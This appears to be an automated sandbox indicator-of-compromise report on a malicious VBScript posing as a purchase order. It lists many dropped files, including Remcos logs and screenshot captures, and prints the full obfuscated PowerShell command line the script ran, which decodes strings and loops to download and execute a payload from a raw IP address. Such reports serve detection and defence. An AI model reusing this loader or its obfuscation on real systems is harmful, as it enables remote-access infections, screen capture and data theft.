IOC Report
REVISED NEW ORDER 7936-2024.vbs

loading gif

Files

File Path
Type
Category
Malicious
REVISED NEW ORDER 7936-2024.vbs
ASCII text, with CRLF line terminators
initial sample
 malicious
C:\ProgramData\remcos\logs.dat
data
dropped
 malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Microsoft Cabinet archive data, Windows 2000/XP setup, 69993 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184000.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184100.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184200.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184302.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184404.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184504.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184614.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184715.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184815.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_184915.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185015.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185115.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185215.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185316.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185417.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185517.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185617.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185718.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185818.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_185918.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190018.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190118.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190218.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190318.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190419.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190519.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190619.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190719.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190819.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_190919.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191019.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191119.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191219.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191319.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191419.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191519.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191620.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191720.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191820.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_191920.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192020.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192120.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192220.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192320.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192420.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192520.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192620.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192721.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192821.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_192921.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193021.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193121.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193221.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193321.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193421.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193521.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193621.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193721.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193821.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_193921.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194022.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194122.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194222.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194322.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194422.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194522.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194622.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194722.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194822.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_194922.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195023.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195123.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195223.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195323.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195423.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195523.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195623.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195723.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195823.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_195923.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200023.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200124.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200224.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200324.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200424.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200524.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200624.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200724.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200824.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_200924.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201024.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201124.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201224.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201324.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201425.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201525.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201625.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201725.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201825.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_201925.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202025.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202125.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202225.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202325.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202425.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202525.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202625.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202726.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202827.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_202927.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203027.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203127.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203228.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203328.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203428.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203528.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203628.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203728.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203828.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_203928.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204028.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204128.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204228.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204328.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204429.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204530.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204630.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204730.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204830.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_204931.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205031.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205131.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205231.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205331.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205431.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205531.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205631.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205732.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205833.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_205935.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210035.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210135.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210236.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210336.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210436.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210536.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210636.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210736.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210836.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_210937.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211037.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211138.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211238.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211338.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211438.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211538.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211638.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211738.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211839.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_211940.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212040.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212140.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212240.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212340.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212441.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212541.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212641.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212741.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212843.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_212943.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213043.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213143.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213243.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213344.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213444.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213544.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213646.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213746.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213846.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_213946.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214046.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214146.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214247.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214349.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214449.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214549.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214649.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214749.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214850.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_214950.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215052.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215155.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215256.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215356.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215456.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215559.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215659.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215759.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_215900.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220000.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220102.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220202.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220302.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220403.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220505.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220605.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220706.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220806.dat
data
dropped
 malicious
C:\Users\user\AppData\Roaming\Screenshots\time_20240502_220908.dat
data
dropped
 malicious
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json
JSON data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
data
modified
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2s1cjq5i.guo.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4iryjg50.bi0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ajeqfl5s.zwa.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ivj52lbz.scn.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\bhv8461.tmp
Extensible storage engine DataBase, version 0x620, checksum 0xf663cf20, page size 32768, DirtyShutdown, Windows version 10.0
dropped
C:\Users\user\AppData\Local\Temp\peqezcketotthbxautag
Unicode text, UTF-16, little-endian text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\deklaration.Sup
ASCII text, with very long lines (65536), with no line terminators
dropped
There are 213 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\REVISED NEW ORDER 7936-2024.vbs"
 malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Nedskrivningstidspunkter = 1;$Hotplate='S';$Hotplate+='ubstrin';$Hotplate+='g';Function Andelskapitals($Hentningens){$Stadsgartnerne167=$Hentningens.Length-$Nedskrivningstidspunkter;For($Perifere=6; $Perifere -lt $Stadsgartnerne167; $Perifere+=(7)){$Lungfishes+=$Hentningens.$Hotplate.Invoke( $Perifere, $Nedskrivningstidspunkter);}$Lungfishes;}function Ordonnant($splatcher){& ($Typechecke) ($splatcher);}$Nonlover=Andelskapitals ' Sys.aMG oundo hypopzHast.eiMetacrlP,nktulE,sekuaUdfore/Salva.5F.lked.Sto.mh0Bjerge Slips (C llutWBa aviiout,abnSpearmdBasisaoGustneweuryprs ,nsyn ,elaarNCor ndTDec,nc Ign,r1meadwo0Insali.Rygskk0.ceptr;,eutro CamporWReveiliBetalin Co,pl6 Shyes4Bra in;Tegn,f Fjern,xAmmoni6Ch.ysa4 Ps ud;Chemeh Trichor BefrdvTrilli:degend1Archse2r mmea1Shrimp.Macada0 Smrke)No loc RidderGTreskieUhjt,dc PaasykSkurveoUnp in/Introd2Sulted0H.hcer1 fiks.0Missan0 Ulpko1Elect,0 Uds,i1Her.is Lager.FAntipriSams.er Dunfie VarimfsndrerouninvexBroder/Fleece1Ste ku2Fonot,1Frigin.Oblige0Au ifo ';$Staser112=Andelskapitals 'L.gestUPostkasAlkohoe.nlaidr rero-Ka.ensAGaldesgE.dosaeUnsof ncou.tet Garvn ';$tamari=Andelskapitals ' Wic,ihSkridttFlisebtFlinkepRelaks:Spis k/Cablem/ esews8C.efsa7Drame,. Ubehv1Startl2 Dishi1 March. nrum1 Unbed0Aarlig5G psba.Pr.duk1Opteg 8 Oplys4Periv,/NeoclaUD,tabedOmnifavKas,ageCo.logjRetshanWhatsiiAlvildnO,gaveg CleweecowgirrSkriv,nPensioe Miracs Me.pa.SpinulaBovrupaforsknfDi.ndr ';$Unhesitatively=Andelskapitals ' Julea>Rhizop ';$Typechecke=Andelskapitals 'OrfedeiShyesseBesrgex Fr.tt ';$Boblegummiets142='Flyverdragterne';Ordonnant (Andelskapitals 'Plast.SCancane Sociat Udraa-wa,tebCAtavisoRek.rsnDiskoft Ild,leTransvnGu.deltRelosi Dok,me-Sla,gePOuttroaB.kebitNowtschSam.en indtjTKalibr:Torlek\Titre,HProlepaSmokehnVand.ok Idio nMexicasBek ftv DibensRokkesnTjreple Abstrt ocamasCharla3Myelof4Aargan.Photo t PickaxUlydigt,ormon Swith-GutturVCalo,iaVoltenl Khaf uGa biee A,tim ortjn$McnaugBC.llefo nthrbSksforltoldfoeKommutgObligauThuggemSpaltemsonnibiLappedetinta.t AttessAm.est1Noncoo4 ecidi2Cariam;Capafa ');Ordonnant (Andelskapitals ',ostvsiOmfo.mftiaars Change(Tm erftLakkedeHasenss TuvaltA,vask- Ascenp Tes,uaApriortAcronyhGylden ritonT Minim:Bund l\K.pitaHalvarsa Te.ron G,netkSticklnHol,afs gurnav nvades .redin specieDammust rottesKlassi3Sgneda4 Serie.Fi.klvtRhinanxbreasttMultim)Sp,uci{Ministe Br.dexGrundviNdringt Sprog}Doreth;R.cipr ');$Nonenvious = Andelskapitals 'Mistnke spec,cT,avelhHypo,toNo enc Komple%Ov rheasmdenapCorpsmpskurend Midjeaeuectit EfteraBroade%Ejidos\Ko.roidLitmusePathankTolvaalSh rtealaithrr Umisfa SpisetT ansmi WormroEntwinnconsec. ashiSurinseuJea.sepOccide Vesteu&Nuppe.&extra HankneSkurvoc.ulmothSatayfoStat,s iste$kolle. ';Ordonnant (Andelskapitals 'Matri,$Plovfug,arbgel KleptoRoligebMortada,etteflBienni:Cyanocb ErminamingelaK,rkebsM.skinkRede,iaPigmenpSnilde=vandre( trewcTredvemRestpldStartk Borem./Exo ercAuturg reoler$slith,NCuadrioRugos,nTro.fleRib,onn GorsyvSat niiIntercoLsninguN klassUnbonn) Guin ');Ordonnant (Andelskapitals 'Bo,uso$ Flertg Ost alEksprooTonginb frankaWastlalSpartl:Re.dysBHookeri Progrm YashmiF avrilAfb,ndlCed,ellBas eteSengetnPar lenmand,aiAlvor.aKonver=Fl,wer$Persect O flyaAvisndmIdeanfa Domi,rTjenliiInsemi.ElektrsBy.gelpEnhv.rlRice ii BlodptAndroc( Pumic$ onoloUUn,scunFilteshJasperePate tsDelfitiJo,suntIndtegaAartietS.viori,pladevStartee DrudflHeapsoyG,tevr) Coa,n ');$tamari=$Bimilllennia[0];Ordonnant (Andelskapitals 'Solsik$Srgemag RaphalS gregoAgathibSol.ysaMatronlE broi: MisddA.evareuNonagerAls,diisyst mgNe.fourGela,iaLag inp Bulmeh kom,oyWhitel1.onoch6Me,rif8Civi i=.aacreNGlo,mieSub,arw B.spn-Zeal,dO R prib Kodifj UinaleAd ptec AgermtLedni, Haplo.S curmuyPre.stsSuperatVoldtaePe nagmAlogot.SharewNE emeneFestontKlapsa.UncameW Ngst,eSa.hedbD rgekCExorcilGener,i n wsleB.rricnOppebrtSp ndy ');Ordonnant (Andelskapitals 'Wistar$AnaeroA,ternouVandsprProaliiKuliltgBib iorAccumuaMaksimpLemu eh IntelySydame1Pec,or6Saddel8Reetab. FortsHCircumeTrin.ta icherdPicotieNonprorS epdasFuttoc[ Brand$V,dehaSTa.ientEksploadeklarsPindsve V,deor Bothl1Bygden1Pdofil2 ,osen].onero=Antine$ TirsdNSuffaroRulleknNedkomlForarmoUncircvStsydseSkurkerTryp,n ');$Conjuncts=Andelskapitals 'Dep avA tageuVrtdyrrStraffiManudug Fishbr limmeaVlessap St,rehVerdeny Unorm1Ablati6 Ur,ni8Uds ag.WopsboD UrbanoCerat,wEnshean BenzilMi.dstoGalilaaAdmiradPi.kawFFragmei.orstalSt,muleHooke.(Hydato$Cataget.verdnaPolyanmPre.iaatj.nebrPersoniGlobus,Hir in$s.ildpSBerappp radioaPornognudtrksiRhymero Stropl.ightsaDecentt.plevceRockla)Om.ind ';$Conjuncts=$baaskap[1]+$Conjuncts;$Spaniolate=$baaskap[0];Ordonnant (Andelskapitals 'Spi,el$Afbring Hy,anlBilligo,rejerb sliskaF.gsellAlloyt:OdilesHKulturaMa blyeFiskesmForedeoIntercrStoraarLets nh MandsaPhlebog I cini.opeienDu chygLoused= Colla(Form sTSkadegeV rslasAk,arit Humer- ManifPWallflaChondrtHadronh heter Untott$Parag SSymmetpraveliaC oplan Tilv,iHudgenoAnalg.l .anglaVaretat.useumeUncoor),nkelt ');while (!$Haemorrhaging) {Ordonnant (Andelskapitals 'Bundsn$FilologEnthral Strepo SpectbPannela SpeedlMat,ic: naffFRed,utoha.delr GenopeGrotonsrecondtLsessoi Soranl Demo l.onirriF,udernSyzygegTrstegsBugserkMaskinr Fras,e NoncodLnforssAnti he FamilnSy temeSp ndi= ,rawf$SkrmentForretrShellfu cullieLkkest ') ;Ordonnant $Conjuncts;Ordonnant (Andelskapitals ' friedSadidastA,stema .fblnrForslat Chelo- arbejSU,toadlVrdipaeDupliceSommerpTel.sk Vomere4Cit am ');Ordonnant (Andelskapitals 'Myelof$LogogrgVarliglAr ustoManropbKo,turaShinbol,orhip: LustiHBagslaaElbenmeunvitrmSploshoDil.ymrBemo lrUmaadehGesundaBa tergCathodiSmagstnL.banegBomben=Tvindc(St uthTHaa.cyeRecagis itemit Unsen-SwotteP AbdiaaSvibletFdeegnhgoloch Seders$Sande,SForsigp xpiraKhubbenS.rmeriRomanioHed.ril Oply,aTragedtunconteArgent)Beskyt ') ;Ordonnant (Andelskapitals ' omito$ S,ndegBudgetl Afk.ioBlkhatbG,yconaFlaekhl Nonm :Af.pndC Gremlhpostpalpoodeco metapr Udfr oElkomfhPackmay NaaeddBushelrL mineotermokc bernia megalrClimanbVel.rdo,ysternNemmen=microg$ ,ymphgUgrliglTwitcho.ichenbRes,rpa,ilslulStigm.:Ko torFFremhva Bri.lgDignifkVrd hfrUdmatriS akestNeophiiJouncek hemitkRash uevaabennHk,ene+Eutect+ nterd%Schill$JagheeBOmstniiPr,ikemOmgangiDepotelUpholsl Ballal OverdeHunknsn Pr.tonKlemteiHomoe.aGardeh.Patronc ElectoUnallouHepatanAlbe tt Br.dn ') ;$tamari=$Bimilllennia[$Chlorohydrocarbon];}Ordonnant (Andelskapitals 'Headsa$Kreditg VerdslLe.urioModifibOrthodaAloer.lOphold:MagicsUReprsepretsbesAvicull.edroniEvolvepSllesc Titan= Helin ,nepigGBagkldeBalsamtPerime- 